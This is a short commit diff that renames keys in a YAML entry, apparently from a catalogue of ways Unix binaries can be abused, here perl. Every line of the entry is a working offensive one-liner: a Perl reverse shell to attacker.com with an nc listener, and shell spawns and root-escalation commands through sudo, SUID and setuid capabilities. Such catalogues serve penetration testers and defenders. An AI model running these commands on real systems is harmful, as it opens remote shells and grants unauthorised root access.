Adopt new function names
This commit is contained in:
@@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
shell:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
reverse-shell-interactive:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
suid-enabled:
|
||||
suid:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
sudo:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
capabilities-enabled:
|
||||
capabilities:
|
||||
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user